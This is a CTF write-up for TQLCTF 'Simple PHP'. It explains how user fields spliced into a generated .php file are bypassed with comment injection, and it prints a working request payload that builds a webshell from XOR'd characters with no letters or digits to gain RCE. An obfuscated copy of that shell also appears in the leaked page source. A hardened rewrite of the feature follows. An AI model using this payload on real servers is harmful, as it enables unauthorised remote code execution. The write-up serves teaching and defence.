    TQLCTF-Simple PHP

    February 21, 2022 • Read: 508 • Competition WP

    After registering and logging in, capturing the traffic shows one place with an arbitrary file read.

    Read index.php.
    Key code:

    // Allowlist check on user: word characters plus / ( ) * < > are permitted
    if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
        // Allowlist check on website: word characters plus / * : . ; ( ) newline < >
        if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
            // punctuation is "cleaned" by stripping letters, digits, > and ? (and commas, since the commas are inside the class)
            $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
            $template = file_get_contents('./template.html');
            // User-controlled strings are spliced straight into the template;
            // $hash_pass and $hash_user are set earlier in index.php (not shown in this excerpt)
            $content = str_replace("__USER__", $_POST['user'], $template);
            $content = str_replace("__PASS__", $hash_pass, $content);
            $content = str_replace("__WEBSITE__", $_POST['website'], $content);
            $content = str_replace("__PUNC__", $_POST['punctuation'], $content);
            // The result is written as a .php file, so whatever lands in it is executable
            file_put_contents('sandbox/'.$hash_user.'.php', $content);
            echo("<script>alert('Successed!');</script>");
        }
        else{
            echo("<script>alert('Invalid chars in website!');</script>");
        }
    }
    else{
        echo("<script>alert('Invalid chars in username!');</script>");
    }

    Getshell without letters or digits.
    Reference: p神's article: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
    The parameter we control is punctuation, so the shell is passed in through it.

    It turned out not to be parsed (as PHP). Guessing it was being parsed as HTML instead, I captured the request again and used the arbitrary file read to fetch this page's source.

    Key code:

    <?php
                        error_reporting(0);
                        $user = ((string)3);
                        $pass = ((string)zsfeccbc87e4b5ce2fe28308fd9f2a7baf3);
    
                        if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
                            echo($_COOKIE['user']);
                        }
                        else{
                            die("<script>alert('Permission denied!');</script>");
                        }
                        ?>
                    </li>
                </ul>
                <ul class="item">
                    <li><span class="sitting_btn"></span>系统设置</li>
                    <li><span class="help_btn"></span>使用指南 <b></b></li>
                    <li><span class="about_btn"></span>关于我们</li>
                    <li><span class="logout_btn"></span>退出系统</li>
                </ul>
            </div>
        </div>
    </div>
    <a href="#" class="powered_by">$_=(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`');$__='_'.('
        '^']').('/'^'`').(''^']').('  '^']');$___=$$__;$_($___[_]);</a>
    <ul id="deskIcon">
        <li class="desktop_icon" id="win5" path="https://image.baidu.com/"> <span class="icon"><img src="../img/icon4.png"/></span>

    It is indeed parsed as HTML, but the key point is $user = ((string)3); the 3 here is the value of user, so we can use a comment to bypass it.

    So the payload:

    user=1)/*&pass=1&website=1&punctuation=*/;$_=('%01'^'`').('%13'^'`'). ('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`'). ('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);/*
    

    RCE achieved.
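    The root cause in both code excerpts above is the same: request-controlled strings (user, website, punctuation, and the user value echoed into the cookie check) are spliced into a file that the server later executes as PHP, so a character allowlist cannot save it once a comment opener in one field and a closer in another are combined. As an added example that is not part of this write-up or the challenge source, the following shows the same profile-page feature written so that user input can never become code: anchored, reject-on-failure allowlists without ( ) * / < >, HTML escaping of every value, and output to a static .html file. The template placeholder names are taken from the excerpt; $hash_user is assumed to be a hex digest computed elsewhere, and the template string at the bottom is a constructed sample.

```php
<?php
// Added example, not the challenge's own code. Hardened rewrite of the
// "write a profile page" feature shown in the write-up.
declare(strict_types=1);

// Anchored allowlist that rejects instead of "cleaning". preg_match returns
// false on error, so comparing against 1 treats both a non-match and an
// engine error as a rejection.
function validate_field(string $value, string $allowed_pattern, int $max_len): string
{
    if (strlen($value) > $max_len || preg_match($allowed_pattern, $value) !== 1) {
        throw new InvalidArgumentException('Invalid characters or length');
    }
    return $value;
}

// Build the page body. No ( ) * / < > in user, no raw splicing, and no
// __PASS__ placeholder: credentials do not belong in a rendered page.
function render_profile(array $post, string $template): string
{
    $user    = validate_field($post['user'] ?? '',        '/\A[A-Za-z0-9_]{1,32}\z/', 32);
    $website = validate_field($post['website'] ?? '',     '/\A[A-Za-z0-9_.:\/-]{1,128}\z/', 128);
    $punc    = validate_field($post['punctuation'] ?? '', '/\A[[:punct:]]{0,32}\z/', 32);

    // Escape every value before it lands in markup, so even the allowed
    // punctuation (including /* and */) is inert text in the browser.
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    return str_replace(
        ['__USER__', '__WEBSITE__', '__PUNC__'],
        [$esc($user), $esc($website), $esc($punc)],
        $template
    );
}

// Persist as a static .html file the web server serves but never executes.
// $hash_user is assumed to be a hex digest; the filter keeps the file name
// inside sandbox/ even if that assumption is ever violated.
function save_profile(string $html, string $hash_user): string
{
    $name = preg_replace('/[^a-f0-9]/', '', $hash_user);
    if ($name === '') {
        throw new InvalidArgumentException('Invalid user hash');
    }
    $path = 'sandbox/' . $name . '.html';
    file_put_contents($path, $html, LOCK_EX);
    return $path;
}

// Constructed sample input (not from the challenge).
$template = "<p>User: __USER__</p><p>Site: __WEBSITE__</p><p>Sig: __PUNC__</p>";
$html = render_profile(
    ['user' => 'alice', 'website' => 'example.org', 'punctuation' => '!?'],
    $template
);
// A request such as user=1)/* now fails validate_field() and never reaches
// the template; nothing in $html is executable on the server either way.
```

    With this shape the cookie-check snippet from the second excerpt disappears as well: the user value is compared at request time from session state rather than being baked into a generated PHP file, so there is no source text for a comment to close.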

    TQLCTF-SQL_TEST
    The challenge author's problem-setting diary: https://igml.top/2022/02/20/TQLCTF2022/
    I'm still pretty bad at this, haha.

    Last Modified: March 2, 2022